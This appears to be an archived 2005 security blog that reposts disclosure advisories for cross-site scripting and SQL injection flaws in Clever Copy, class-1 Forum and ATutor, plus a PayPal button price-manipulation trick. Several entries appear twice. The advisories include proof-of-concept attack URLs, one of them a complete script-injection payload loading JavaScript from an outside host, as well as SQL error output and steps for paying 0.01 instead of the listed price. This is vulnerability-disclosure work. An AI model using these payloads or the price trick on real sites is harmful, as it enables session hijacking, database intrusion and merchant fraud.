################################################
Clever copy 'calendar.php' 'yr' variable cross site scripting
vendor url:http://clevercopy.bestdirectbuy.com
advisory:http://lostmon.blogspot.com/2005/07/
clever-copy-calendarphp-yr-variable.html
vendor notify: yes exploit available:yes
OSVDB ID:17919
Securitytracker: 1014492
BID: 14278
################################################
Clever Copy is a free, fully scalable web site portal and news posting
system.You can run it as a very simple blog or ramp it up to a full
Content Management System
Clever Copy contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate 'yr'
variable upon submission to 'calendar.php' script.This could allow a
user to create a specially crafted URL that would execute arbitrary
code in a user's browser within the trust relationship between
the browser and the server, leading to a loss of integrity
##############
VERSIONS
##############
Clever Copy version 2.0a
Clever Copy version 2.0
##############
SOLUTION
##############
No solution at this time
##############
TIMELINE
##############
Discovered: 12-07-2005
Vendor notify: 13-07-2005
Vendor response:14-07-2005
Disclosure: 15-07-2005
##############
EXPLOIT
##############
http://[victim]/calendar.php?mth=3&yr=2006"><script src="http://www.drorshalev.com/dev/injection/js.js"></script>
######################## €nd #############################
Thnx to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente...
class-1 Forum Software Cross site scripting
Thursday, July 14, 2005
#########################################################
class-1 Forum Software Cross site scripting.
Original advisore:http://lostmon.blogspot.com/2005/07/
class-1-forum-software-cross-site.html
Vendor url:http://www.class1web.co.uk/download_forum.php
Vendor notify: yes exploit available: yes
OSVDB ID:17920,17921,17922,17923
Secunia: SA16078
BID: 14261
Securitytracker: 1014485 1014486
##########################################################
class-1 Forum Software is a PHP/MySQL driven web forum
class-1 Forum contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application
does not validate 'viewuser_id' and 'group' variables upon
submission to 'users.php' script.This could allow a user to create
a specially crafted URL that would execute arbitrary code in a user's
browser within the trust relationship between the browser and
the server,leading to a loss of integrity
##################
versions
##################
class-1 Forum Software (v 0.23.2) vulnerable.
class-1 Forum Software (v 0.24.4) vulnerable.
it is posible that other versions are vulnerables too.
Clever Copy (http://clevercopy.bestdirectbuy.com/)
with forums module afected instaled.
Clever Copy 2.0
Clever Copy 2.0a
###################
Solution
###################
no solution at this time.
################
Timeline
################
discovered: 10-07-2005
vendor notify: 12-07-2005 (Webform)
vendor response:
2 vendor response:12-07-2005 (Clever Copy)
disclosure: 14-07-2005
##############################
proof of Cross site Scripting
##############################
http://[victim]/forum/users.php?mode=viewprofile&viewuser_id=89[XSS-code]
http://[victim]/forum/users.php?mode=viewgroup&group=Moderators[XSS-code]
#########################
posible SQL injections
#########################
http://www.class1web.co.uk/forum/viewattach.php?id=[SQL-Injection]
SQL Error
There was an error executing the query - SELECT * FROM attachments
WHERE attach_id='''
You have an error in your SQL syntax near ''''' at line 1
-------
http://[victim]/forum/users.php?mode=viewprofile&viewuser_id=[SQL-Injection]
There was an error executing the query - SELECT * FROM users
WHERE user_id='''
You have an error in your SQL syntax near ''''' at line 1
--------
http://[victim]/forum/viewforum.php?mode=view&id=[SQL-Injection]
There was an error executing the query - SELECT * FROM messages
WHERE id='''
You have an error in your SQL syntax near ''''' at line 1
---------
http://[victim]/forum/viewforum.php?forum=[SQL-Injection]
There was an error executing the query - SELECT * FROM group_permissions
WHERE forum_id=''' AND forum_hidden='1' AND group_name='Standard Users'
You have an error in your SQL syntax near '1' AND group_name='Standard Users'' at line 1
----------
#################### €nd ###########################
Thnx to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
class-1 Forum Software Cross site scripting.
Original advisore:http://lostmon.blogspot.com/2005/07/
class-1-forum-software-cross-site.html
Vendor url:http://www.class1web.co.uk/download_forum.php
Vendor notify: yes exploit available: yes
OSVDB ID:17920,17921,17922,17923
Secunia: SA16078
BID: 14261
Securitytracker: 1014485 1014486
##########################################################
class-1 Forum Software is a PHP/MySQL driven web forum
class-1 Forum contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application
does not validate 'viewuser_id' and 'group' variables upon
submission to 'users.php' script.This could allow a user to create
a specially crafted URL that would execute arbitrary code in a user's
browser within the trust relationship between the browser and
the server,leading to a loss of integrity
##################
versions
##################
class-1 Forum Software (v 0.23.2) vulnerable.
class-1 Forum Software (v 0.24.4) vulnerable.
it is posible that other versions are vulnerables too.
Clever Copy (http://clevercopy.bestdirectbuy.com/)
with forums module afected instaled.
Clever Copy 2.0
Clever Copy 2.0a
###################
Solution
###################
no solution at this time.
################
Timeline
################
discovered: 10-07-2005
vendor notify: 12-07-2005 (Webform)
vendor response:
2 vendor response:12-07-2005 (Clever Copy)
disclosure: 14-07-2005
##############################
proof of Cross site Scripting
##############################
http://[victim]/forum/users.php?mode=viewprofile&viewuser_id=89[XSS-code]
http://[victim]/forum/users.php?mode=viewgroup&group=Moderators[XSS-code]
#########################
posible SQL injections
#########################
http://www.class1web.co.uk/forum/viewattach.php?id=[SQL-Injection]
SQL Error
There was an error executing the query - SELECT * FROM attachments
WHERE attach_id='''
You have an error in your SQL syntax near ''''' at line 1
-------
http://[victim]/forum/users.php?mode=viewprofile&viewuser_id=[SQL-Injection]
There was an error executing the query - SELECT * FROM users
WHERE user_id='''
You have an error in your SQL syntax near ''''' at line 1
--------
http://[victim]/forum/viewforum.php?mode=view&id=[SQL-Injection]
There was an error executing the query - SELECT * FROM messages
WHERE id='''
You have an error in your SQL syntax near ''''' at line 1
---------
http://[victim]/forum/viewforum.php?forum=[SQL-Injection]
There was an error executing the query - SELECT * FROM group_permissions
WHERE forum_id=''' AND forum_hidden='1' AND group_name='Standard Users'
You have an error in your SQL syntax near '1' AND group_name='Standard Users'' at line 1
----------
#################### €nd ###########################
Thnx to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
ATutor multiple variable Cross site scripting
Wednesday, June 15, 2005
################################################
ATutor multiple variable Cross site scripting
vendor url:http://www.atutor.ca/atutor/download.php
ADVISORE:http://lostmon.blogspot.com/2005/06/
atutor-multiple-variable-cross-site.html
VENDOR NOTIFY: YES EXPLOIT AVAILABLE: YES
OSVDB ID:17351,17352,17353,17354,17355
17356,17357,17358,17359.
Secunia: SA15705
Securitytracker: 1014216
BID: 13972
################################################
ATutor is an Open Source Web-based Learning Content
Management System (LCMS) designed with accessibility
and adaptability in mind.
ATutor contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application
does not validate multiple variables upon submission
to multiple scripts. script.This could allow a user to
create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.
###########
versions:
###########
ATutor 1.4.3 vulnerable
ATutor 1.5 RC 1 vulnerable
ATutor 1.5 RC 2 vulnerable
Atutor 1.5 RC 3 not tested
#############
solution
#############
Upgrade to version ATutor 1.5RC3 or higher, as it has been
reported to fix this vulnerability. An upgrade is required
as there are no known workarounds.
##############
timeline
##############
discovered: 10-06-2005
vendor notify: 14-06-2005 (webform)
vendor response: 27-06-2005
disclosure: 16-06-2005
##################
Proof of concepts
##################
http://[VICTIM]/ATutor/browse.php?cat=0&show_course=1[XSS-CODE]
http://[VICTIM]/ATutor/contact.php?subject=[XSS-CODE]
http://[VICTIM]/atutor/content.php?cid=323[XSS-CODE]
http://[VICTIM]/atutor/inbox/send_message.php?l=1[XSS-CODE]
http://[VICTIM]/atutor/search.php?search=10[XSS-CODE]
&words=kk&include=all&find_in=this&display_as=pages
&search=Search
http://[VICTIM]/ATutor/search.php?search=1&words=aa[XSS-CODE]
&include=one&find_in=all&display_as=summaries&search=Search
#search_results
http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one[XSS-CODE]&find_in=all&display_as=
summaries&search=Search#search_results
http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one&find_in=all[XSS-CODE]&display_as=
summaries&search=Search#search_results
http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one&find_in=all&display_as=[XSS-CODE]
summaries&search=Search#search_results
http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one&find_in=all&display_as=summaries&search
=[XSS-CODE]Search#search_results
http://[VICTIM]/ATutor/inbox/index.php?view=1[XSS-CODE]
http://[VICTIM]/ATutor/tile.php?query=yy
&field=technicalFormat&submit=Search[XSS-CODE]
http://[VICTIM]/ATutor/tile.php?query=[XSS-CODE]
&field=technicalFormat&submit=Search
http://[VICTIM]/ATutor/tile.php?query=yy&
field=technicalFormat[XSS-CODE]&submit=Search
http://[VICTIM]/ATutor/forum/subscribe_forum.php?
fid=2&us=1[XSS-CODE]
http://[VICTIM]/ATutor/directory.php?roles%5B%5D=[XSS-CODE]
1&roles%5B%5D=2&roles%5B%5D=3&status=1&submit=Filter
http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5
B%5D=[XSS-CODE]2&roles%5B%5D=3&status=1&submit=Filter
http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B
%5D=2&roles%5B%5D=3[XSS-CODE]&status=1&submit=Filter
http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B
%5D=2&roles%5B%5D=3&status=1[XSS-CODE]&submit=Filter
http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B
%5D=2&roles%5B%5D=3&status=1&submit=Filter[XSS-CODE]
http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&status=
2&reset_filter=Reset+Filter[XSS-CODE]
http://[VICTIM]/ATutor/directory.php?roles[]=1[XSS-CODE]
for exploting some flaws , need a client login.
Others scripts and others variables are vulnerable
to the same style attack.
############### €nd ##############
Thnx to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
ATutor multiple variable Cross site scripting
vendor url:http://www.atutor.ca/atutor/download.php
ADVISORE:http://lostmon.blogspot.com/2005/06/
atutor-multiple-variable-cross-site.html
VENDOR NOTIFY: YES EXPLOIT AVAILABLE: YES
OSVDB ID:17351,17352,17353,17354,17355
17356,17357,17358,17359.
Secunia: SA15705
Securitytracker: 1014216
BID: 13972
################################################
ATutor is an Open Source Web-based Learning Content
Management System (LCMS) designed with accessibility
and adaptability in mind.
ATutor contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application
does not validate multiple variables upon submission
to multiple scripts. script.This could allow a user to
create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.
###########
versions:
###########
ATutor 1.4.3 vulnerable
ATutor 1.5 RC 1 vulnerable
ATutor 1.5 RC 2 vulnerable
Atutor 1.5 RC 3 not tested
#############
solution
#############
Upgrade to version ATutor 1.5RC3 or higher, as it has been
reported to fix this vulnerability. An upgrade is required
as there are no known workarounds.
##############
timeline
##############
discovered: 10-06-2005
vendor notify: 14-06-2005 (webform)
vendor response: 27-06-2005
disclosure: 16-06-2005
##################
Proof of concepts
##################
http://[VICTIM]/ATutor/browse.php?cat=0&show_course=1[XSS-CODE]
http://[VICTIM]/ATutor/contact.php?subject=[XSS-CODE]
http://[VICTIM]/atutor/content.php?cid=323[XSS-CODE]
http://[VICTIM]/atutor/inbox/send_message.php?l=1[XSS-CODE]
http://[VICTIM]/atutor/search.php?search=10[XSS-CODE]
&words=kk&include=all&find_in=this&display_as=pages
&search=Search
http://[VICTIM]/ATutor/search.php?search=1&words=aa[XSS-CODE]
&include=one&find_in=all&display_as=summaries&search=Search
#search_results
http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one[XSS-CODE]&find_in=all&display_as=
summaries&search=Search#search_results
http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one&find_in=all[XSS-CODE]&display_as=
summaries&search=Search#search_results
http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one&find_in=all&display_as=[XSS-CODE]
summaries&search=Search#search_results
http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one&find_in=all&display_as=summaries&search
=[XSS-CODE]Search#search_results
http://[VICTIM]/ATutor/inbox/index.php?view=1[XSS-CODE]
http://[VICTIM]/ATutor/tile.php?query=yy
&field=technicalFormat&submit=Search[XSS-CODE]
http://[VICTIM]/ATutor/tile.php?query=[XSS-CODE]
&field=technicalFormat&submit=Search
http://[VICTIM]/ATutor/tile.php?query=yy&
field=technicalFormat[XSS-CODE]&submit=Search
http://[VICTIM]/ATutor/forum/subscribe_forum.php?
fid=2&us=1[XSS-CODE]
http://[VICTIM]/ATutor/directory.php?roles%5B%5D=[XSS-CODE]
1&roles%5B%5D=2&roles%5B%5D=3&status=1&submit=Filter
http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5
B%5D=[XSS-CODE]2&roles%5B%5D=3&status=1&submit=Filter
http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B
%5D=2&roles%5B%5D=3[XSS-CODE]&status=1&submit=Filter
http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B
%5D=2&roles%5B%5D=3&status=1[XSS-CODE]&submit=Filter
http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B
%5D=2&roles%5B%5D=3&status=1&submit=Filter[XSS-CODE]
http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&status=
2&reset_filter=Reset+Filter[XSS-CODE]
http://[VICTIM]/ATutor/directory.php?roles[]=1[XSS-CODE]
for exploting some flaws , need a client login.
Others scripts and others variables are vulnerable
to the same style attack.
############### €nd ##############
Thnx to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
PayPal arbitrary price manipulation
Monday, May 30, 2005
##############################################
PayPal 'butons' price manipulation.
vendor url:https://www.paypal.com/
http://lostmon.blogspot.com/2005/05/
paypal-arbitrary-price-manipulation.html
vendor notify: yes exploit available: yes
Discovered by FalconDeOro(1) and Lostmon(2)
##############################################
PayPal buttons are prone to price manipulation.
all stores based on PayPal buttons are posible
vulnerables to this flaw.
##########################
code example of a button
##########################
the proof is based on this form:
https://www.paypal.com/us/cgi-bin/webscr?cmd=p/xcl/rec/options-help-outside
in the exmple of explotation we used "PayPal price manipulation kit " program to shop.
This is Non existent product...
the link of the button for shopping have this url:
(1)
https://www.paypal.com/cgi-bin/webscr?cmd=_xclick
&business=[EMAIL-Bussines]&item_name=PayPal+price+manipulation+ kit&item_number=1&amount=19.90&no_shipping=1&return
=[SITE SUBMIT]&cancel_return=[SITE RETURN]&submit.x=70&submit.y=15
this is the normal price for the product (19.90$) but...
if we change 'amount' variable to 0.01 the product now cost 0.01$
https://www.paypal.com/cgi-bin/webscr?cmd=_xclick
&business=[EMAIL-Bussines]&item_name=PayPal+price+manipulation+ kit&item_number=1&amount=0.01&no_shipping=1&return
=[SITE SUBMIT]&cancel_return=[SITE RETURN]&submit.x=70&submit.y=15
another way to exploiting this situation:
(2)
this other example coming from a stored based on paypal:
https://www.paypal.com/cart/add=1&business=[EMAIL-Bussines]
&item_name=PayPal+price+manipulation+ kit&item_number=
7&return=[SITE SUBMIT]&cancel_return=[SITE RETURN]&amount=[PRICE]&shipping=0
&shipping2=0&handling=0&rm=2&custom=1¤cy_code=USD
if we look we can change not only the price , we can change the email account
name of product, and other details.
for shopping you need an account on PayPal.
#############
timeline:
#############
discovered: 14 may 2005
vendor notify: 25 may 2005
Vendor response: 26 may 2005
disclosure: 27 may 2005
Public disclosure: 30 may 2005
################### End ####################
thnx to estrella to be my ligth
thnx to icaro he is my support
Thnx to FalconDeOro ... patience.
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
contact to FalconDeOro
(falcondeoro@gmail.com)
http://falcondeoro.blogspot.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente
PayPal 'butons' price manipulation.
vendor url:https://www.paypal.com/
http://lostmon.blogspot.com/2005/05/
paypal-arbitrary-price-manipulation.html
vendor notify: yes exploit available: yes
Discovered by FalconDeOro(1) and Lostmon(2)
##############################################
PayPal buttons are prone to price manipulation.
all stores based on PayPal buttons are posible
vulnerables to this flaw.
##########################
code example of a button
##########################
the proof is based on this form:
https://www.paypal.com/us/cgi-bin/webscr?cmd=p/xcl/rec/options-help-outside
in the exmple of explotation we used "PayPal price manipulation kit " program to shop.
This is Non existent product...
the link of the button for shopping have this url:
(1)
https://www.paypal.com/cgi-bin/webscr?cmd=_xclick
&business=[EMAIL-Bussines]&item_name=PayPal+price+manipulation+ kit&item_number=1&amount=19.90&no_shipping=1&return
=[SITE SUBMIT]&cancel_return=[SITE RETURN]&submit.x=70&submit.y=15
this is the normal price for the product (19.90$) but...
if we change 'amount' variable to 0.01 the product now cost 0.01$
https://www.paypal.com/cgi-bin/webscr?cmd=_xclick
&business=[EMAIL-Bussines]&item_name=PayPal+price+manipulation+ kit&item_number=1&amount=0.01&no_shipping=1&return
=[SITE SUBMIT]&cancel_return=[SITE RETURN]&submit.x=70&submit.y=15
another way to exploiting this situation:
(2)
this other example coming from a stored based on paypal:
https://www.paypal.com/cart/add=1&business=[EMAIL-Bussines]
&item_name=PayPal+price+manipulation+ kit&item_number=
7&return=[SITE SUBMIT]&cancel_return=[SITE RETURN]&amount=[PRICE]&shipping=0
&shipping2=0&handling=0&rm=2&custom=1¤cy_code=USD
if we look we can change not only the price , we can change the email account
name of product, and other details.
for shopping you need an account on PayPal.
#############
timeline:
#############
discovered: 14 may 2005
vendor notify: 25 may 2005
Vendor response: 26 may 2005
disclosure: 27 may 2005
Public disclosure: 30 may 2005
################### End ####################
thnx to estrella to be my ligth
thnx to icaro he is my support
Thnx to FalconDeOro ... patience.
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
contact to FalconDeOro
(falcondeoro@gmail.com)
http://falcondeoro.blogspot.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente
Subscribe to:
Posts (Atom)